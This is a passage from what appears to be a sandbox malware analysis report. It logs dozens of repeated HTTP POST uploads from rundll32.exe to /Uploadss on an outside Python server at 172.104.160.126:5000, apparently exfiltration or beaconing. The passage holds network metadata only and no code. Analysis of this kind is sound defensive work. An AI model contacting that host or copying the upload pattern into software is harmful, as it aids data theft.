                              78192.168.2.649265172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:05.562108040 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0f60835c471703b6
                              Jul 22, 2024 16:00:06.792000055 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:06 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              79192.168.2.649266172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:06.824263096 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------30e95938f8d682b4
                              Jul 22, 2024 16:00:08.239770889 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:08 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              80192.168.2.649267172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:08.263936043 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------fa71821352b7a857
                              Jul 22, 2024 16:00:09.234426975 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:09 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              81192.168.2.649269172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:09.259970903 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------1d41fea49894b271
                              Jul 22, 2024 16:00:11.306943893 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:10 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:11.310334921 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:10 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:11.311840057 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:10 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              82192.168.2.649270172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:11.321324110 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4c1e4f796c2c9c93
                              Jul 22, 2024 16:00:13.272167921 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:13.273399115 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:13.285157919 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:12 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              83192.168.2.649271172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:13.288706064 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------fff4f274d4698b1d
                              Jul 22, 2024 16:00:14.261641026 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:14 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              84192.168.2.649272172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:14.280905962 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------edd5ebff721373ff
                              Jul 22, 2024 16:00:15.464314938 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:15 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              85192.168.2.649273172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:15.491976023 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------e20020832d30f3c0
                              Jul 22, 2024 16:00:16.720884085 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:16 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              86192.168.2.649274172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:16.739691019 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------d4472314239c3705
                              Jul 22, 2024 16:00:17.833395004 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:17 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              87192.168.2.649275172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:17.860945940 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------7e127aa7b6ef26df
                              Jul 22, 2024 16:00:18.791853905 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:18 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              88192.168.2.649276172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:18.814730883 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------0cf99223c92232cd
                              Jul 22, 2024 16:00:19.780041933 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:19 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              89192.168.2.649277172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:19.823656082 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------7ce2fb84c3dc7384
                              Jul 22, 2024 16:00:21.688350916 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:20 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:21.691196918 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:20 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              90192.168.2.649278172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:21.708918095 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------d8f7e01a7de6f04f
                              Jul 22, 2024 16:00:23.288867950 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:22 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:23.290394068 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:22 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              91192.168.2.649279172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:23.323446989 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------f7a61e38904fcff7
                              Jul 22, 2024 16:00:24.307172060 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:24 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              92192.168.2.649280172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:24.333306074 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------8977623888b015d2
                              Jul 22, 2024 16:00:25.545228004 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:25 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              93192.168.2.649281172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:25.563039064 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------8961b875dcb6c2ce
                              Jul 22, 2024 16:00:26.712783098 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:26 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              94192.168.2.649282172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:26.739160061 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------00f564c0c06baa17
                              Jul 22, 2024 16:00:27.735567093 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:27 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              95192.168.2.649283172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:27.753508091 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------eaaf87d8ac660071
                              Jul 22, 2024 16:00:28.761029005 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:28 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              96192.168.2.649284172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:28.781773090 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4db416eccd57981d
                              Jul 22, 2024 16:00:29.732780933 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:29 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              97192.168.2.649285172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:29.754950047 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6ea26e32a284dc76
                              Jul 22, 2024 16:00:31.072359085 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:30 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Jul 22, 2024 16:00:31.072774887 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:30 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              98192.168.2.649286172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:31.084009886 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4be51b091cf7dce2
                              Jul 22, 2024 16:00:32.119106054 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:31 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              99192.168.2.649287172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:32.146512985 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------fffb92063f61af58
                              Jul 22, 2024 16:00:33.110915899 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:32 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              100192.168.2.649288172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:33.131515026 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------bcadf6652bcb5995
                              Jul 22, 2024 16:00:34.082405090 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:33 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              101192.168.2.649289172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:34.104792118 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a0c3d46717813838
                              Jul 22, 2024 16:00:35.344614029 CEST188INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:35 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close
                              Data Raw: 7b 0a 20 20 22 6d 65 73 73 61 67 65 22 3a 20 22 6f 6b 22 0a 7d 0a
                              Data Ascii: { "message": "ok"}


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              102192.168.2.649290172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:35.359400034 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------71e83fa42945e82e
                              Jul 22, 2024 16:00:36.545949936 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:36 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              103192.168.2.649291172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:36.559890032 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------2774b4aa52ecef71
                              Jul 22, 2024 16:00:37.539288044 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:37 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              104192.168.2.649292172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:37.574383020 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------9299cdde274089f9
                              Jul 22, 2024 16:00:38.541229010 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:38 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              105192.168.2.649293172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:38.564542055 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------32889ea7ae55e121
                              Jul 22, 2024 16:00:44.267913103 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:44 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              106192.168.2.649294172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:44.301352024 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------a678ad0b838c4a42
                              Jul 22, 2024 16:00:45.357834101 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:45 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              107192.168.2.649295172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:45.456721067 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------271c99aa13addee5
                              Jul 22, 2024 16:00:46.457094908 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:46 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              108192.168.2.649296172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:46.488893986 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------4d702bb6621a98ce
                              Jul 22, 2024 16:00:47.500313044 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:47 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              109192.168.2.649297172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:47.526498079 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------3ff2595632dfd343
                              Jul 22, 2024 16:00:48.465368032 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:48 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              110192.168.2.649298172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:48.509367943 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------6be2ae2c8e7d9a07
                              Jul 22, 2024 16:00:49.527154922 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:49 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              111192.168.2.649299172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:49.545937061 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------5287d62a7467fc4e
                              Jul 22, 2024 16:00:50.513243914 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:50 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              112192.168.2.649300172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:50.537250996 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------124d7d68b6a08cfd
                              Jul 22, 2024 16:00:51.532246113 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:51 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              113192.168.2.649301172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:51.556179047 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------837b5fa459944e4b
                              Jul 22, 2024 16:00:52.558851004 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:52 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              114192.168.2.649302172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:52.576524973 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------22f31a976d8ccacd
                              Jul 22, 2024 16:00:53.595066071 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:53 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              115192.168.2.649303172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:53.639671087 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------adf6f33d0b6a389e
                              Jul 22, 2024 16:00:54.591725111 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:54 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              116192.168.2.649304172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:54.611356020 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------69954c1bb23fa243
                              Jul 22, 2024 16:00:55.556974888 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:55 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              117192.168.2.649305172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:55.571405888 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------54f15fd9c89287c7
                              Jul 22, 2024 16:00:56.606450081 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:56 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              118192.168.2.649306172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
                              Jul 22, 2024 16:00:56.633208036 CEST176OUTPOST /Uploadss HTTP/1.1
                              Host: 172.104.160.126:5000
                              Accept: */*
                              Content-Length: 1456
                              Content-Type: multipart/form-data; boundary=------------------------862973e7d8c5e47a
                              Jul 22, 2024 16:00:57.601979017 CEST166INHTTP/1.1 200 OK
                              Server: Werkzeug/3.0.3 Python/3.10.12
                              Date: Mon, 22 Jul 2024 14:00:57 GMT
                              Content-Type: application/json
                              Content-Length: 22
                              Connection: close


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              119192.168.2.649307172.104.160.12650005940C:\Windows\System32\rundll32.exe
                              TimestampBytes transferredDirectionData
